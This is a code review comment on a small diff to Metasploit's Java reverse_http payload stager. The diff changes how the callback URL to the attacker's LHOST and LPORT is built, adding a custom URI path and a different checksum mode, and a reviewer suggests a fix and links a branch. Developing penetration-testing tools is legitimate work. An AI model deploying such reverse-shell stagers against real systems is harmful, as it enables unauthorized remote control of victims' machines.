modules/payloads/stagers/java/reverse_http.rb

```diff
@@ -53,8 +53,8 @@ def config
     c << "Spawn=#{spawn}\n"
     c << "URL=http://#{datastore["LHOST"]}"
     c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
-    c << "/"
-    c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
+    c << "#{luri}"
+    c << generate_uri_checksum(:init_java, uri_req_len)
```

Comment:
oops, I meant over here - it should be generate_uri_uuid_mode()

Check out my rebased branch https://github.com/bcook-r7/metasploit-framework/tree/test-luri, it seems to work.